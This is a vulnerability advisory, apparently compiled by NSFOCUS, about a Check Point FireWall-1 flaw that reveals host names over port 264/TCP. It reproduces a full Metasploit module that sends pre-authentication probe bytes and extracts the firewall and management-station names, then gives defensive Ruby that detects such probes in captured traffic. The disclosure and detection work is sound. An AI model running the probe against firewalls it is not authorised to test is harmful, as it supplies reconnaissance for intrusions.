Information Disclosure Vulnerability in Multiple Check Point Firewall Products

Published: 2012-03-12
Updated: 2012-03-14

Affected systems:
Check Point Software FireWall-1 NGX R71
Check Point Software FireWall-1 NGX R65
Description:
BUGTRAQ  ID: 52430

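Check Point Software Technologies Ltd., founded in 1993 with its US headquarters in Redwood City, California, is a leading global provider of Internet security solutions and a market leader in enterprise firewalls, personal firewalls and virtual private networks (VPN).

Multiple Check Point endpoint security products contain an information disclosure vulnerability in their implementation: sending certain queries to port 264/TCP on a CheckPoint Firewall-1 causes the host name to be revealed. An attacker can exploit this vulnerability to obtain sensitive information.


<*Source: Patrick Webster (pwebster@ausgeo.com.au)
  *>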

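Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!

Patrick Webster (pwebster@ausgeo.com.au) provided the following test method: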

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

    include Msf::Exploit::Remote::Tcp

    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'CheckPoint Firewall-1 SecuRemote Topology Service Hostname Disclosure',
            'Description'    => %q{
                This module sends a query to the port 264/TCP on CheckPoint Firewall-1
                firewalls to obtain the firewall name and management station
                (such as SmartCenter) name via a pre-authentication topology request.
                Note that the SecuriTeam reference listed here is not the same vulnerability, but it
                does discuss the same protocol and is somewhat related to this information
                disclosure.
            },
            'Author'         => [ 'patrick' ],
            'DisclosureDate' => 'Dec 14 2011', # Looks like this module is first real reference
            'References'     =>
                [
                    # patrickw - None? Stumbled across, probably an old bug/feature but unsure.
                    [ 'URL', 'http://www.osisecurity.com.au/advisories/' ], # Advisory coming soon, placeholder
                    [ 'URL', 'http://www.securiteam.com/securitynews/5HP0D2A4UC.html' ] # Related-ish
                ]
        ))

        register_options(
            [
                Opt::RPORT(264),
            ], self.class)
    end

    def autofilter
        false
    end

    def run
        print_status("Attempting to contact Checkpoint FW1 SecuRemote Topology service...")
        fw_hostname = nil
        sc_hostname = nil

        connect

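        # Opening bytes of the pre-authentication topology request
        sock.put("\x51\x00\x00\x00")
        sock.put("\x00\x00\x00\x21")
        # A 4-byte reply of "Y\x00\x00\x00" is taken as the service answering
        res = sock.get_once(4)
        if (res == "Y\x00\x00\x00")
            print_good("Appears to be a CheckPoint Firewall...")
            # 0x0000000b (11) matches the byte length of the NUL-terminated "securemote"
            sock.put("\x00\x00\x00\x0bsecuremote\x00")
            res = sock.get_once
            # The names are extracted from a CN=...,O=... string in the reply
            if (res =~ /CN=(.+),O=(.+)\./i)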
                fw_hostname = $1
                sc_hostname = $2
                print_good("Firewall Host: #{fw_hostname}")
                print_good("SmartCenter Host: #{sc_hostname}")
            end
        else
            print_error("Unexpected response: '#{res.inspect}'")
        end

        report_info(fw_hostname,sc_hostname)

        disconnect
    end

    # Only trust that it's real if we have a hostname. If you get a funny
    # response, it might not be what we think it is.
    def report_info(fw_hostname,sc_hostname)
        return unless fw_hostname
        host_info = {
            :host => datastore['RHOST'],
            :os_name => "Checkpoint Firewall-1",
            :purpose => "firewall"
        }
        host_info[:name] = fw_hostname
        host_info[:info] = "SmartCenter Host: #{sc_hostname}" if sc_hostname
        report_host(host_info)
        svc_info = {
            :host => datastore['RHOST'],
            :port => datastore['RPORT'],
            :proto => "tcp",
            :name => "securemote"
        }
        report_service(svc_info)
    end

end

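Recommendations:
Vendor patch:

Check Point Software
--------------------
The vendor has released an upgrade patch that fixes this security issue. Download it from the vendor's home page: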

http://www.checkpoint.com
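
Captured traffic to 264/TCP can be checked for the query shown in the test method above and for the names returned in reply. The Ruby below is an added example, not part of the original advisory or of the Metasploit module. The flow hash shape, the trusted network list and the sample flows (including the byte layout of the sample reply) are assumptions constructed for illustration.

```ruby
require 'ipaddr'

# Byte sequences the module on this page sends to 264/TCP, in order.
PROBE_PARTS = [
  "\x51\x00\x00\x00".b,
  "\x00\x00\x00\x21".b,
  "\x00\x00\x00\x0bsecuremote\x00".b
].freeze
ACK = "Y\x00\x00\x00".b         # reply the module treats as a Check Point firewall
NAME_RE = /CN=(.+),O=(.+)\./i   # same pattern the module applies to the reply

# True when the client-to-server bytes contain all three parts in order.
def topology_probe?(client_bytes)
  data = client_bytes.b
  pos = 0
  PROBE_PARTS.all? do |part|
    idx = data.index(part, pos)
    pos = idx + part.bytesize if idx
    !idx.nil?
  end
end

# Names disclosed in the server-to-client bytes, or nil if none were returned.
def disclosed_names(server_bytes)
  data = server_bytes.b
  return nil unless data.start_with?(ACK)
  m = NAME_RE.match(data)
  m && { firewall: m[1], management: m[2] }
end

# flows: hashes {src:, dport:, c2s:, s2c:} rebuilt from a capture (hypothetical shape).
# trusted: CIDR strings for networks expected to use this service (assumption).
def untrusted_topology_queries(flows, trusted)
  nets = trusted.map { |c| IPAddr.new(c) }
  flows.select { |f| f[:dport] == 264 && topology_probe?(f[:c2s]) }
       .reject { |f| nets.any? { |n| n.include?(IPAddr.new(f[:src])) } }
       .map { |f| { src: f[:src], leaked: disclosed_names(f[:s2c]) } }
end

# Constructed sample flows (not real traffic); public addresses are documentation ranges.
SAMPLE_FLOWS = [
  { src: "203.0.113.7", dport: 264, c2s: PROBE_PARTS.join,
    s2c: ACK + "\x00\x00\x00\x00CN=fw-example,O=mgmt-example.abc123\x00".b },
  { src: "10.1.2.3", dport: 264, c2s: PROBE_PARTS.join, s2c: ACK },
  { src: "198.51.100.9", dport: 264, c2s: "\x51\x00\x00\x00".b, s2c: "".b }
].freeze

untrusted_topology_queries(SAMPLE_FLOWS, ["10.0.0.0/8"]).each { |hit| p hit }
```

A hit whose `leaked` field is not nil means the firewall and management station names were returned to a source outside the trusted networks.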

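This vulnerability advisory was translated and compiled by NSFOCUS. All rights reserved; reproduction without permission is prohibited.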